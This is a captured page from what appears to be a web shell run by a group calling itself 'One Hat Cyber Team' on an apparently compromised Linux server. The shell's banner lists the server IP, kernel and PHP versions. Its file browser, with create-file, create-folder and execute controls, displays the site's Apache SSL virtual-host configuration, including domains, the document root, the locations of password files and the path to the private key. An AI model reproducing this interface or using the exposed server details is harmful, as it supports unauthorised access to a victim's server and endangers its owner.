⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
apache2
/
sites-enabled
/
View File Name :
sendnova.enroles.com-le-ssl.conf
<IfModule mod_ssl.c> <VirtualHost 65.108.141.171:443 [2a01:4f9:1a:9191::2]:443> SuexecUserGroup #1842 #1822 ServerName sendnova.enroles.com ServerAlias www.sendnova.enroles.com ServerAlias mail.sendnova.enroles.com ServerAlias webmail.sendnova.enroles.com ServerAlias admin.sendnova.enroles.com DocumentRoot /home/sendnova/public_html ErrorLog /var/log/virtualmin/sendnova.enroles.com_error_log CustomLog /var/log/virtualmin/sendnova.enroles.com_access_log combined ScriptAlias /cgi-bin/ /home/sendnova/cgi-bin/ ScriptAlias /awstats /home/sendnova/cgi-bin/awstats.pl DirectoryIndex index.php index.php4 index.php5 index.htm index.html <Directory /home/sendnova/public_html> Options -Indexes +IncludesNOEXEC +SymLinksIfOwnerMatch allow from all AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch Require all granted </Directory> <Directory /home/sendnova/cgi-bin> allow from all AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch Require all granted </Directory> ProxyPass /.well-known ! ProxyPass /dav/ ! RewriteEngine on # Some rewrite rules in this file were disabled on your HTTPS site, # because they have the potential to create redirection loops. # RewriteCond %{HTTP_HOST} =webmail.sendnova.enroles.com # RewriteRule ^(?!/.well-known)(.*) https://sendnova.enroles.com:20000/ [R] # RewriteCond %{HTTP_HOST} =admin.sendnova.enroles.com # RewriteRule ^(?!/.well-known)(.*) https://sendnova.enroles.com:10000/ [R] RemoveHandler .php RemoveHandler .php5.6 RemoveHandler .php7.0 RemoveHandler .php7.1 RemoveHandler .php7.2 RemoveHandler .php7.3 RemoveHandler .php7.4 RemoveHandler .php8.0 RemoveHandler .php8.1 RemoveHandler .php8.2 RemoveHandler .php8.3 <Files awstats.pl> AuthName "six.heloix.com statistics" AuthType Basic AuthUserFile /home/sendnova/.awstats-htpasswd require valid-user </Files> ProxyPassReverse /dav/ ! <Location /dav> DAV on AuthType Basic AuthName six.heloix.com AuthUserFile /home/sendnova/etc/dav.digest.passwd Require valid-user ForceType text/plain Satisfy All RemoveHandler .php RemoveHandler .php5.6 RemoveHandler .php7.0 RemoveHandler .php7.1 RemoveHandler .php7.2 RemoveHandler .php7.3 RemoveHandler .php7.4 RemoveHandler .php8.0 RemoveHandler .php8.1 RemoveHandler .php8.2 RemoveHandler .php8.3 RewriteEngine off </Location> <FilesMatch \.php$> SetHandler proxy:unix:/run/php/1722246461300798.sock|fcgi://127.0.0.1 </FilesMatch> SSLCertificateFile /etc/letsencrypt/live/sendnova.enroles.com/fullchain.pem SSLCertificateKeyFile /etc/letsencrypt/live/sendnova.enroles.com/privkey.pem Include /etc/letsencrypt/options-ssl-apache.conf </VirtualHost> </IfModule>